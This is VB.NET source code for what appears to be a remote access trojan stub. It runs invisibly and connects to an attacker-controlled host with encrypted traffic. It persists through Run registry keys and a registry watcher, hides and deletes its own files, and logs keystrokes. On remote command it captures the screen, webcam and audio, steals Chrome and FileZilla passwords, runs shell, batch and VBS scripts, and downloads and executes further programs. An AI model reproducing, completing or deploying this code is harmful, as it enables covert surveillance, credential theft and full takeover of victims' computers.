Imports System.WindowsImports SystemImports System.Windows.FormsImports Sy

1. Imports System.Windows
2. Imports System
3. Imports System.Windows.Forms
4. Imports System.Windows.Forms.Form
5. Imports Microsoft.VisualBasic
6. Imports System.Reflection
7. Imports System.Net
8. Imports System.Net.Sockets
9. Imports System.Threading
10. Imports System.IO
11. Imports System.Runtime.InteropServices
12. Imports System.Management
13. Imports System.Text.RegularExpressions
14. Imports System.Text
15. Imports Microsoft.Win32
16. Imports System.Net.NetworkInformation
17. Imports System.Drawing
18. Imports System.ServiceProcess
19.  
20. <Assembly: AssemblyTitle("ASSEMBLYTITLE")>
21. <Assembly: AssemblyDescription("ASSEMBLYDESCRIPTION")>
22. <Assembly: AssemblyCompany("ASSEMBLYCOMPANY")>
23. <Assembly: AssemblyProduct("ASSEMBLYPRODUCT")>
24. <Assembly: AssemblyCopyright("ASSEMBLYCOPYRIGHT")>
25. <Assembly: AssemblyTrademark("ASSEMBLYTRADEMARK")>
26. <Assembly: AssemblyVersion("3.5.2.4")>
27. <Assembly: AssemblyFileVersion("0.0.0.0")>
28.  
29. Namespace MyApp
30. Public Class EntryPoint
31. Public Shared Sub Main(args As [String]())
32. Dim FrmMain As New Form1
33. FrmMain.Size = New System.Drawing.Size(0, 0)
34. FrmMain.ShowInTaskbar = False
35. FrmMain.Visible = False
36. FrmMain.Opacity = 0
37. System.Windows.Forms.Application.Run(FrmMain)
38. End Sub
39. End Class
40. Public Class Form1
41. Inherits System.Windows.Forms.Form
42. Dim client As TcpClient
43. Dim Connection As Thread
44. Dim enckey As String = "magic_key"
45. Dim screensending As Thread
46. Dim comp As Long
47. Dim res As String
48. Private Declare Function SetCursorPos Lib "user32" (ByVal X As Integer, ByVal Y As Integer) As Integer
49. Public Declare Sub mouse_event Lib "user32" Alias "mouse_event" (ByVal dwFlags As Integer, ByVal dx As Integer, ByVal dy As Integer, ByVal cButtons As Integer, ByVal dwExtraInfo As Integer)
50. Private Const MOUSEEVENTF_LEFTDOWN As Object = &H2
51. Private Const MOUSEEVENTF_LEFTUP As Object = &H4
52. Private Const MOUSEEVENTF_RIGHTDOWN As Object = &H8
53. Private Const MOUSEEVENTF_RIGHTUP As Object = &H10
54.  
55. Private Declare Function GetForegroundWindow Lib "user32.dll" () As Int32
56. Private Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hwnd As Int32, ByVal lpString As String, ByVal cch As Int32) As Int32
57. Dim WithEvents logger As New Keylogger
58. Dim logs As String
59. Dim strin As String
60. Dim curntdir2 As String
61. Dim listviewfiles As New ListView
62. Dim tbmessage As New TextBox
63. Dim rtblogs As New RichTextBox
64. Dim chat As New Form
65. Dim discomousing As Thread
66. #Region "Fun Declerations"
67. Private Declare Function SystemParametersInfo Lib "user32" Alias "SystemParametersInfoA" (ByVal uAction As Integer, ByVal uParam As Integer, ByVal lpvParam As String, ByVal fuWinIni As Integer) As Integer
68. Private Const SETDESKWALLPAPER As Integer = 20
69. Private Const UPDATEINIFILE As Long = &H1
70. Declare Function GetDesktopWindow Lib "user32" () As Long
71. Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Integer) As Long
72. Public Const WM_SYSCOMMAND As Long = &H112&
73. Public Const SC_SCREENSAVE As Long = &HF140&
74. Private Declare Function SwapMouseButton& Lib "user32" (ByVal bSwap As Long)
75. Private Declare Function SystemParametersInfo Lib "user32" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Integer, ByVal lpvParam As Long, ByVal fuWinIni As Long) As Long
76. Declare Function mciSend Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpszCommand As String, ByVal lpszReturnString As String, ByVal cchReturnLength As Long, ByVal hwndCallback As Long) As Long
77. Private Declare Function FindWindow Lib "user32.dll" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Int32
78. Private Declare Function ShowWindow Lib "user32.dll" (ByVal hwnd As IntPtr, ByVal nCmdShow As Int32) As Int32
79. Private Const SW_HIDE As Int32 = 0
80. Private Const SW_RESTORE As Int32 = 9
81. Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long
82. Private Const SWP_HIDEWINDOW As Long = &H80
83. Private Const SWP_SHOWWINDOW As Long = &H40
84. #End Region
85. <DllImport("winmm.dll")> _
86. Private Shared Function mciSendString(ByVal command As String, ByVal buffer As StringBuilder, ByVal bufferSize As Integer, ByVal hwndCallback As IntPtr) As Integer
87. End Function
88. #Region "Webcam Declerations"
89. Dim picCapture As New PictureBox
90. Const WM_CAP As Short = &H400S
91. Const WM_CAP_DRIVER_CONNECT As Integer = WM_CAP + 10
92. Const WM_CAP_DRIVER_DISCONNECT As Integer = WM_CAP + 11
93. Const WM_CAP_EDIT_COPY As Integer = WM_CAP + 30
94. Const WM_CAP_SET_PREVIEW As Integer = WM_CAP + 50
95. Const WM_CAP_SET_PREVIEWRATE As Integer = WM_CAP + 52
96. Const WM_CAP_SET_SCALE As Integer = WM_CAP + 53
97. Const WS_CHILD As Integer = &H40000000
98. Const WS_VISIBLE As Integer = &H10000000
99. Const SWP_NOMOVE As Short = &H2S
100. Const SWP_NOSIZE As Short = 1
101. Const SWP_NOZORDER As Short = &H4S
102. Const HWND_BOTTOM As Short = 1
103. Dim iDevice As Integer = 0
104. Dim hHwnd As Integer
105. Declare Function SendWebcam Lib "user32" Alias "SendMessageA" (ByVal hwnd As Integer, ByVal wMsg As Integer, ByVal wParam As Integer, ByVal lParam As Object) As Integer
106. Declare Function SetWebcamPos Lib "user32" Alias "SetWindowPos" (ByVal hwnd As Integer, ByVal hWndInsertAfter As Integer, ByVal x As Integer, ByVal y As Integer, ByVal cx As Integer, ByVal cy As Integer, ByVal wFlags As Integer) As Integer
107. Declare Function DestroyWebcam Lib "user32" (ByVal hndw As Integer) As Boolean
108. Declare Function capCreateCaptureWindowA Lib "avicap32.dll" (ByVal lpszWindowName As String, ByVal dwStyle As Integer, ByVal x As Integer, ByVal y As Integer, ByVal nWidth As Integer, ByVal nHeight As Short, ByVal hWndParent As Integer, ByVal nID As Integer) As Integer
109. Declare Function capGetDriverDescriptionA Lib "avicap32.dll" (ByVal wDriver As Short, ByVal lpszName As String, ByVal cbName As Integer, ByVal lpszVer As String, ByVal cbVer As Integer) As Boolean
110. Dim webcamsending As Thread
111. #End Region
112. Dim installenable, dropinsubfolder, startupenable, startupdir, startupuser, startuplocal, regpersistence, melt, delay As Boolean
113. Dim dropsubfoldername, dropname, path As String
114. Dim delaytime As Integer
115. Dim WithEvents reg As New RegistryWatcher
116. Dim objMutex As Mutex
117. Sub New()
118. logger.CreateHook()
119. End Sub
120. #Region "Connection"
121. Sub Connect()
122. TryAgain:
123. Try
124. client = New TcpClient("IPFUCKINGADDRESS", 4431)
125. Send(AES_Encrypt("NewConnection|" & GetInfo() & "|" & SystemInformation.UserName.ToString() & "|" & SystemInformation.ComputerName.ToString() & "|" & My.Computer.Info.OSFullName & "|" & My.Computer.Info.OSVersion & "|" & getpriv(), enckey))
126. client.GetStream().BeginRead(New Byte() {0}, 0, 0, AddressOf Read, Nothing)
127. Catch ex As Exception
128. GoTo TryAgain
129. End Try
130. End Sub
131. Sub Read(ByVal ar As IAsyncResult)
132. Dim message As String
133. Try
134. Dim reader As New StreamReader(client.GetStream())
135. message = reader.ReadLine()
136. message = AES_Decrypt(message, enckey)
137. parse(message)
138. client.GetStream().BeginRead(New Byte() {0}, 0, 0, AddressOf Read, Nothing)
139. Catch ex As Exception
140. Threading.Thread.Sleep(4000)
141. Connect()
142. End Try
143. End Sub
144. Public Sub Send(ByVal message As String)
145. Try
146. Dim writer As New StreamWriter(client.GetStream())
147. writer.WriteLine(message)
148. writer.Flush()
149. Catch
150. End Try
151. End Sub
152. Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
153. Try
154. objMutex = New Mutex(False, "SINGLE_INSTANCE_APP_MUTEX")
155. If objMutex.WaitOne(0, False) = False Then
156. objMutex.Close()
157. objMutex = Nothing
158. Application.ExitThread()
159. End
160. End If
161.  
162. installenable = VEKEGFZKE
163. dropinsubfolder = BCIEZTC
164. dropsubfoldername = "VJKFZGUIZG"
165. startupenable = BCHJEIK
166. startupdir = GERIU
167. startupuser = BURE
168. startuplocal = IUEQ
169. regpersistence = GTUIER
170. melt = BEUORF
171. delay = VWIUF
172. dropname = "GUER"
173. path = "HFFguD"
174. delaytime = GTREIGTF
175.  
176. If delay = True Then
177. System.Threading.Thread.Sleep(delaytime * 1000)
178. End If
179.  
180. If Application.ExecutablePath.Contains("Temp") Or Application.ExecutablePath.Contains("AppData") Or Application.ExecutablePath.Contains("Program") Then
181. GoTo 1
182. End If
183.  
184. If installenable = True Then
185. If dropinsubfolder = True Then
186. If Not My.Computer.FileSystem.DirectoryExists(getPath(path) & "\" & dropsubfoldername) Then
187. My.Computer.FileSystem.CreateDirectory(getPath(path) & "\" & dropsubfoldername)
188. End If
189. IO.File.WriteAllBytes(getPath(path) & "\" & dropsubfoldername & "\" & dropname, IO.File.ReadAllBytes(Application.ExecutablePath))
190. domelt(getPath(path) & "\" & dropsubfoldername & "\" & dropname)
191. Exit Sub
192. Else
193. IO.File.WriteAllBytes(getPath(path) & "\" & dropname, IO.File.ReadAllBytes(Application.ExecutablePath))
194. domelt(getPath(path) & "\" & dropname)
195. Exit Sub
196. End If
197. End If
198.  
199. 1: If startupenable = True Then
200. If startupdir = True Then
201. Dim nam As String = New IO.FileInfo(Application.ExecutablePath).Name
202. IO.File.WriteAllBytes(Environment.GetFolderPath(Environment.SpecialFolder.Startup).ToString & "\" & nam, IO.File.ReadAllBytes(Application.ExecutablePath))
203. ElseIf startupuser = True Then
204. Dim regkey As RegistryKey
205. regkey = Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
206. regkey.SetValue(New IO.FileInfo(Application.ExecutablePath).Name.Replace(".exe", ""), Chr(34) & Application.ExecutablePath & Chr(34))
207. ElseIf startuplocal = True Then
208. Dim regkey As RegistryKey
209. regkey = Registry.LocalMachine.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
210. regkey.SetValue(New IO.FileInfo(Application.ExecutablePath).Name.Replace(".exe", ""), Chr(34) & Application.ExecutablePath & Chr(34))
211. If regpersistence = True Then
212. reg.AddWatcher(RegistryWatcher.HKEY_ROOTS.HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Run", New IO.FileInfo(Application.ExecutablePath).Name.Replace(".exe", ""))
213. End If
214. End If
215. End If
216.  
217. If melt = True Then
218. SetAttr(Application.ExecutablePath, FileAttribute.Hidden)
219. End If
220.  
221. Connection = New Thread(AddressOf Connect)
222. Connection.Start()
223. Catch
224. End Try
225. End Sub
226. Sub parse(ByVal msg As String)
227. Try
228. If msg = "Disconnected" Then
229. Connection.Abort()
230. Connection = New Thread(AddressOf Connect)
231. Connection.Start()
232. ElseIf msg = "SystemInformation" Then
233. Send(AES_Encrypt("SystemInformation|" & getsystem() & GetDeepInfo(), enckey))
234. ElseIf msg = "GetProcess" Then
235. sendprocess()
236. ElseIf msg.StartsWith("Kill") Then
237. KillProcesses(msg)
238. ElseIf msg.StartsWith("New") Then
239. System.Diagnostics.Process.Start(msg.Split("|")(1))
240. ElseIf msg = "Software" Then
241. getinstalledsoftware()
242. ElseIf msg.StartsWith("RD") Then
243. comp = msg.Split("|")(1)
244. res = msg.Split("|")(2)
245. screensending = New Thread(AddressOf sendscreen)
246. screensending.Start()
247. ElseIf msg = "Stop" Then
248. screensending.Abort()
249. ElseIf msg = "GetPcBounds" Then
250. Send(AES_Encrypt("PCBounds" & My.Computer.Screen.Bounds.Height & "x" & My.Computer.Screen.Bounds.Width, enckey))
251. ElseIf msg.Contains("SetCurPos") Then
252. MouseMov(msg)
253. ElseIf msg.StartsWith("OpenWebsite") Then
254. openwebsite(msg.Replace("OpenWebsite", ""))
255. ElseIf msg.StartsWith("DandE") Then
256. dande(msg.Replace("DandE", ""))
257. ElseIf msg.StartsWith("MSG") Then
258. MessageBox.Show(GetBetween(msg, "Body: ", " Icon:", 0), GetBetween(msg, "Title: ", " Body:", 0), MessageBoxButton(GetBetween(msg, "Button: ", " End", 0)), MessageBoxIcn(GetBetween(msg, "Icon: ", " Button:", 0)))
259. ElseIf msg = "GetHostsFile" Then
260. loadhostsfile()
261. ElseIf msg.StartsWith("SaveHostsFile") Then
262. savehostsfile(msg.Replace("SaveHostsFile", ""))
263. ElseIf msg = "GetCPImage" Then
264. getclipboardimage()
265. ElseIf msg = "GetCPText" Then
266. getclipboardtext()
267. ElseIf msg.StartsWith("SaveCPText") Then
268. setclipboardtext(msg.Replace("SaveCPText", ""))
269. ElseIf msg.StartsWith("Shell") Then
270. runshell(msg.Replace("Shell", ""))
271. ElseIf msg = "GetKeyLogs" Then
272. Send(AES_Encrypt("KeyLogs" & logs, enckey))
273. ElseIf msg = "DelKeyLogs" Then
274. logs = ""
275. ElseIf msg = "RecordingStart" Then
276. audio_start()
277. ElseIf msg = "RecordingStop" Then
278. audio_stop()
279. ElseIf msg = "RecordingDownload" Then
280. audio_get()
281. ElseIf msg = "GetPasswords" Then
282. Main.GetChrome()
283. Send(AES_Encrypt("Passwords" & Main.lol & FileZilla(), enckey))
284. ElseIf msg = "GetTCPConnections" Then
285. Send(AES_Encrypt("TCPConnections" & GetTCPConnections(), enckey))
286. ElseIf msg.StartsWith("GetStartup") Then
287. GetStartupEntries()
288. ElseIf msg.StartsWith("UpdateFromLink") Then
289. UpdatefromLink(msg.Replace("UpdateFromLink", ""))
290. ElseIf msg.StartsWith("UpdatefromFile") Then
291. UpdateFromFile(msg.Replace("UpdatefromFile", ""))
292. ElseIf msg.StartsWith("ExecuteFromLink") Then
293. ExecutefromLink(msg.Replace("ExecuteFromLink", ""))
294. ElseIf msg.StartsWith("ExecutefromFile") Then
295. ExecutefromFile(msg.Replace("ExecutefromFile", ""))
296. ElseIf msg = "Restart" Then
297. rstart()
298. ElseIf msg = "Uninstall" Then
299. delete(3)
300. ElseIf msg.StartsWith("RemovefromStartup") Then
301. removefromstartup(msg.Replace("RemovefromStartup", ""))
302. ElseIf msg = "ListDrives" Then
303. listdrives()
304. ElseIf msg.StartsWith("ListFiles") Then
305. showfiles(msg.Replace("ListFiles", ""))
306. ElseIf msg.Contains("mkdir") Then
307. createnewdirectory(msg.Replace("mkdir", ""))
308. ElseIf msg.Contains("rmdir") Then
309. deletedirectory(msg.Replace("rmdir", ""))
310. ElseIf msg.Contains("rnfolder") Then
311. renamedirectory(msg.Replace("rnfolder", "").Split("|")(0), msg.Replace("rnfolder", "").Split("|")(1))
312. ElseIf msg.Contains("mvdir") Then
313. movedirectory(msg.Replace("mvdir", "").Split("|")(0), msg.Replace("mvdir", "").Split("|")(1), msg.Replace("mvdir", "").Split("|")(2))
314. ElseIf msg.Contains("cpdir") Then
315. copydirectory(msg.Replace("cpdir", "").Split("|")(0), msg.Replace("cpdir", "").Split("|")(1), msg.Replace("cpdir", "").Split("|")(2))
316. ElseIf msg.Contains("mkfile") Then
317. CreateNewFile(msg)
318. ElseIf msg.Contains("rmfile") Then
319. deletefile(msg.Replace("rmfile", "").Split("|")(0))
320. ElseIf msg.Contains("rnfile") Then
321. renamefile(msg.Replace("rnfile", "").Split("|")(0), msg.Replace("rnfile", "").Split("|")(1))
322. ElseIf msg.Contains("movefile") Then
323. movefile(msg.Replace("movefile", "").Split("|")(0), msg.Replace("movefile", "").Split("|")(1), msg.Replace("move", "").Split("|")(2))
324. ElseIf msg.Contains("copyfile") Then
325. copyfile(msg.Replace("copyfile", "").Split("|")(0), msg.Replace("copyfile", "").Split("|")(1), msg.Replace("copyfile", "").Split("|")(2))
326. ElseIf msg.StartsWith("sharefile") Then
327. sharefile(msg.Replace("sharefile", ""))
328. ElseIf msg.StartsWith("FileUpload") Then
329. UploadFile(msg.Replace("FileUpload", ""))
330. ElseIf msg = "ListWebcamDevices" Then
331. listdevices()
332. ElseIf msg = "WebcamStart" Then
333. webcamsending = New Thread(AddressOf getwebcam)
334. webcamsending.Start()
335. ElseIf msg.StartsWith("HTMLScripting") Then
336. IO.File.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\FBqINhRdpgnqATxJ.html", msg.Replace("HTMLScripting", ""))
337. System.Diagnostics.Process.Start(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\FBqINhRdpgnqATxJ.html")
338. ElseIf msg.StartsWith("VBSScripting") Then
339. IO.File.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\UjfAPUFPaUkAqQTZ.vbs", msg.Replace("VBSScripting", ""))
340. System.Diagnostics.Process.Start(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\UjfAPUFPaUkAqQTZ.vbs")
341. ElseIf msg.StartsWith("BATScripting") Then
342. IO.File.WriteAllText(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\X53DNwMsMwjtC9JW.bat", msg.Replace("BATScripting", ""))
343. System.Diagnostics.Process.Start(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\X53DNwMsMwjtC9JW.bat")
344. ElseIf msg.StartsWith("GetThumbNails") Then
345. SendThumbNail()
346. ElseIf msg.Contains("Website") Then
347. openwebsite(msg.Split("|")(1))
348. ElseIf msg.Contains("logoff") Then
349. Shell("shutdown /l")
350. ElseIf msg.Contains("shutdwn") Then
351. Shell("shutdown /s")
352. ElseIf msg.Contains("restrt") Then
353. Shell("shutdown /r")
354. ElseIf msg.Contains("Change") Then
355. My.Computer.Network.DownloadFile(msg.Split("|")(0), My.Computer.FileSystem.SpecialDirectories.Temp.ToString & "\wallpaper.jpg")
356. SystemParametersInfo(SETDESKWALLPAPER, 0, My.Computer.FileSystem.SpecialDirectories.Temp.ToString & "\wallpaper.jpg", UPDATEINIFILE)
357. ElseIf msg.Contains("Spk") Then
358. Dim SAPI As Object
359. SAPI = CreateObject("SAPI.spvoice")
360. SAPI.Speak(msg.Split("|")(1).ToString)
361. ElseIf msg.Contains("UndoMouse") Then
362. SwapMouseButton(False)
363. ElseIf msg.Contains("SwapMouse") Then
364. SwapMouseButton(True)
365. ElseIf msg = "CloseCD" Then
366. mciSend("set CDAudio door closed", 0, 0, 0)
367. ElseIf msg = "OpenCD" Then
368. mciSend("set CDAudio door open", 0, 0, 0)
369. ElseIf msg.Contains("ShowIcons") Then
370. Dim hWnd As IntPtr
371. hWnd = FindWindow(vbNullString, "Program Manager")
372. If Not hWnd = 0 Then
373. ShowWindow(hWnd, SW_RESTORE)
374. End If
375. ElseIf msg.Contains("HideIcons") Then
376. Dim hWnd As IntPtr
377. hWnd = FindWindow(vbNullString, "Program Manager")
378. If Not hWnd = 0 Then
379. ShowWindow(hWnd, SW_HIDE)
380. End If
381. ElseIf msg.Contains("ShowTaskbar") Then
382. ShowTaskBar()
383. ElseIf msg.Contains("HideTaskbar") Then
384. HideTaskBar()
385. ElseIf msg = "StartDiscoMouse" Then
386. discomousing = New Thread(AddressOf discomouse)
387. discomousing.Start()
388. ElseIf msg = "StopDiscoMouse" Then
389. discomousing.Abort()
390. ElseIf msg = "WebcamStop" Then
391. webcamsending.Abort()
392. ElseIf msg = "GetServices" Then
393. SendServices()
394. ElseIf msg.StartsWith("ServiceAction") Then
395. Dim res As String = msg.Replace("ServiceAction", "")
396. PerformServiceAction(res.Split("|")(0), res.Split("|")(1))
397. End If
398. Catch
399. End Try
400. End Sub
401. Function getPath(ByVal input As String) As String
402. Select Case input
403. Case "Appdata Local"
404. Return Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData).ToString()
405. Case "Appdata Roaming"
406. Return Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData).ToString()
407. Case "Temp"
408. Return My.Computer.FileSystem.SpecialDirectories.Temp.ToString()
409. Case "Program Files"
410. Return Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles).ToString()
411. Case "Programs"
412. Return Environment.GetFolderPath(Environment.SpecialFolder.Programs).ToString()
413. Case Else : Return Nothing
414. End Select
415. End Function
416. Sub domelt(ByVal path As String)
417. Try
418. Dim p As New System.Diagnostics.ProcessStartInfo("cmd.exe")
419. p.Arguments = "/C ping 1.1.1.1 -n 1 -w " & 3 & " > Nul & Del " & ControlChars.Quote & Application.ExecutablePath & ControlChars.Quote & "&" & ControlChars.Quote & path & ControlChars.Quote
420. p.CreateNoWindow = True
421. p.ErrorDialog = False
422. p.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
423. System.Diagnostics.Process.Start(p)
424. Application.Exit()
425. Catch
426. End Try
427. End Sub
428. Private Sub reg_RegistryChanged(M As RegistryWatcher.Monitor) Handles reg.RegistryChanged
429. Try
430. Dim regkey As RegistryKey
431. regkey = Registry.LocalMachine.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
432. regkey.SetValue(New IO.FileInfo(Application.ExecutablePath).Name.Replace(".exe", ""), Chr(34) & Application.ExecutablePath & Chr(34))
433. Catch
434. End Try
435. End Sub
436. #End Region
437. #Region "Others"
438. Sub discomouse()
439. Try
440. Do
441. Dim mousepos As New System.Drawing.Point
442. mousepos.X = New Random().Next(0, My.Computer.Screen.Bounds.Height)
443. mousepos.Y = New Random().Next(0, My.Computer.Screen.Bounds.Width)
444. System.Windows.Forms.Cursor.Position = mousepos
445. Loop
446. Catch
447. End Try
448. End Sub
449. Sub KillProcesses(ByVal txt As String)
450. Try
451. txt = txt.Replace("Kill|", "")
452.  
453. For i As Integer = 0 To CountCharacter(txt, "|")
454. System.Diagnostics.Process.GetProcessesByName(txt.Split("|")(i).Remove(txt.Split("|")(i).Length - 4, 4))(0).CloseMainWindow()
455. Next
456. Catch
457. End Try
458. End Sub
459. Public Function CountCharacter(ByVal value As String, ByVal ch As Char) As Integer
460. Try
461. Dim cnt As Integer = 0
462. For Each c As Char In value
463. If c = ch Then cnt += 1
464. Next
465. Return cnt
466. Catch
467. Return Nothing
468. End Try
469. End Function
470. Sub openwebsite(ByVal url As String)
471. Try
472. System.Diagnostics.Process.Start(url)
473. Catch : End Try
474. End Sub
475. Sub dande(ByVal url As String)
476. Try
477. Dim web As New WebClient
478. web.DownloadFile(url, My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\file.exe")
479. Shell(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\file.exe")
480. Catch
481. End Try
482. End Sub
483. Private Function GetBetween(ByVal input As String, ByVal str1 As String, ByVal str2 As String, ByVal index As Integer) As String
484. Dim temp As String = Regex.Split(input, str1)(index + 1)
485. Return Regex.Split(temp, str2)(0)
486. End Function
487. Function MessageBoxButton(ByVal Text As String) As Object
488. Select Case Text
489. Case "AbortRetryIgnore"
490. Return MessageBoxButtons.AbortRetryIgnore
491. Case "OK"
492. Return MessageBoxButtons.OK
493. Case "OKCancel"
494. Return MessageBoxButtons.OKCancel
495. Case "RetryCancel"
496. Return MessageBoxButtons.RetryCancel
497. Case "YesNo"
498. Return MessageBoxButtons.YesNo
499. Case "YesNoCancel"
500. Return MessageBoxButtons.YesNoCancel
501. Case Else
502. Return MessageBoxButtons.OK
503. End Select
504. End Function
505. Function MessageBoxIcn(ByVal text As String) As Object
506. Select Case text
507. Case "Asterisk"
508. Return MessageBoxIcon.Asterisk
509. Case "Error"
510. Return MessageBoxIcon.Error
511. Case "Exclamation"
512. Return MessageBoxIcon.Exclamation
513. Case "Hand"
514. Return MessageBoxIcon.Hand
515. Case "Information"
516. Return MessageBoxIcon.Information
517. Case "None"
518. Return MessageBoxIcon.None
519. Case "Question"
520. Return MessageBoxIcon.Question
521. Case "Stop"
522. Return MessageBoxIcon.Stop
523. Case "Warning"
524. Return MessageBoxIcon.Warning
525. Case Else
526. Return MessageBoxIcon.None
527. End Select
528. End Function
529. Sub UpdatefromLink(ByVal url As String)
530. Try
531. My.Computer.Network.DownloadFile(url, My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\updated.exe")
532. Dim p As New System.Diagnostics.ProcessStartInfo("cmd.exe")
533. p.Arguments = "/C ping 1.1.1.1 -n 1 -w 5 > Nul & Del " & ControlChars.Quote & Application.ExecutablePath & ControlChars.Quote
534. p.CreateNoWindow = True
535. p.ErrorDialog = False
536. p.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
537.  
538. Dim pp As New System.Diagnostics.ProcessStartInfo("cmd.exe")
539. pp.Arguments = "/C ping 1.1.1.1 -n 1 -w 5 > Nul & " & ControlChars.Quote & My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\updated.exe" & ControlChars.Quote
540. pp.CreateNoWindow = True
541. pp.ErrorDialog = False
542. pp.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
543.  
544. System.Diagnostics.Process.Start(p)
545. System.Diagnostics.Process.Start(pp)
546.  
547. Application.Exit()
548. Catch
549. End Try
550. End Sub
551. Sub UpdateFromFile(ByVal txt As String)
552. Try
553. File.WriteAllBytes(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\updated.exe", Convert.FromBase64String(txt))
554. Dim p As New System.Diagnostics.ProcessStartInfo("cmd.exe")
555. p.Arguments = "/C ping 1.1.1.1 -n 1 -w 5 > Nul & Del " & ControlChars.Quote & Application.ExecutablePath & ControlChars.Quote
556. p.CreateNoWindow = True
557. p.ErrorDialog = False
558. p.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
559.  
560. Dim pp As New System.Diagnostics.ProcessStartInfo("cmd.exe")
561. pp.Arguments = "/C ping 1.1.1.1 -n 1 -w 5 > Nul & " & ControlChars.Quote & My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\updated.exe" & ControlChars.Quote
562. pp.CreateNoWindow = True
563. pp.ErrorDialog = False
564. pp.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
565.  
566. System.Diagnostics.Process.Start(p)
567. System.Diagnostics.Process.Start(pp)
568.  
569. Application.Exit()
570. Catch
571. End Try
572. End Sub
573. Sub ExecutefromLink(ByVal url As String)
574. Try
575. My.Computer.Network.DownloadFile(url, My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\exec.exe")
576. Shell(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\exec.exe")
577. Catch
578. End Try
579. End Sub
580. Sub ExecutefromFile(ByVal txt As String)
581. Try
582. File.WriteAllBytes(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\exec.exe", Convert.FromBase64String(txt))
583. Shell(My.Computer.FileSystem.SpecialDirectories.Temp.ToString() & "\exec.exe")
584. Catch
585. End Try
586. End Sub
587. Sub rstart()
588. Try
589. Dim p As New System.Diagnostics.ProcessStartInfo("cmd.exe")
590. p.Arguments = "/C ping 1.1.1.1 -n 1 -w 15 > Nul & " & ControlChars.Quote & Application.ExecutablePath & ControlChars.Quote
591. p.CreateNoWindow = True
592. p.ErrorDialog = False
593. p.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
594. System.Diagnostics.Process.Start(p)
595. Application.Exit()
596. Catch
597. End Try
598. End Sub
599. Sub delete(ByVal timeout As Integer)
600. Try
601. SetAttr(Application.ExecutablePath, FileAttribute.Normal)
602. Dim p As New System.Diagnostics.ProcessStartInfo("cmd.exe")
603. p.Arguments = "/C ping 1.1.1.1 -n 1 -w " & timeout & " > Nul & Del " & ControlChars.Quote & Application.ExecutablePath & ControlChars.Quote
604. p.CreateNoWindow = True
605. p.ErrorDialog = False
606. p.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
607.  
608. If startuplocal = True then
609. Dim regkey As RegistryKey
610. regkey = Registry.LocalMachine.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
611. If regpersistence = True Then
612. reg.RemoveWatcher(New IO.FileInfo(Application.ExecutablePath).Name.Replace(".exe", ""))
613. End If
614. regkey.DeleteValue(New IO.FileInfo(Application.ExecutablePath).Name.Replace(".exe", ""))
615. End If
616.  
617. If startupuser = True then
618. Dim regkey As RegistryKey
619. regkey = Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
620. regkey.DeleteValue(New IO.FileInfo(Application.ExecutablePath).Name.Replace(".exe", ""))
621. End if
622.  
623. System.Diagnostics.Process.Start(p)
624. Application.Exit()
625. Catch ex As Exception
626. MsgBox(ex.Message)
627. End Try
628. End Sub
629. Sub removefromstartup(ByVal txt As String)
630. Try
631. If txt.StartsWith("C") Then
632. IO.File.Delete(txt.Replace("|", ""))
633. ElseIf txt.StartsWith("HKEY_CURRENT_USER") Then
634. txt = txt.Replace(txt.Split("\")(0) & "\", "")
635. Dim name As String = txt.Split("|")(1)
636. txt = txt.Replace("\|" & txt.Split("|")(1), "")
637. Dim regkey As RegistryKey = Registry.CurrentUser.OpenSubKey(txt, True)
638. regkey.DeleteValue(name)
639. regkey.Close()
640. ElseIf txt.StartsWith("HKEY_LOCAL_MACHINE") Then
641. txt = txt.Replace(txt.Split("\")(0) & "\", "")
642. Dim name As String = txt.Split("|")(1)
643. txt = txt.Replace("\|" & txt.Split("|")(1), "")
644. Dim regkey As RegistryKey = Registry.LocalMachine.OpenSubKey(txt, True)
645. regkey.DeleteValue(name)
646. regkey.Close()
647. End If
648. Catch
649. End Try
650. End Sub
651. Sub UploadFile(ByVal txt As String)
652. Try
653. 'MsgBox(txt.Split("|")(0))
654. 'IO.File.WriteAllBytes(txt.Split("|")(0), Convert.FromBase64String(txt.Replace(txt.Split("|")(0) & "|", "")))
655. Catch
656. End Try
657. End Sub
658.  
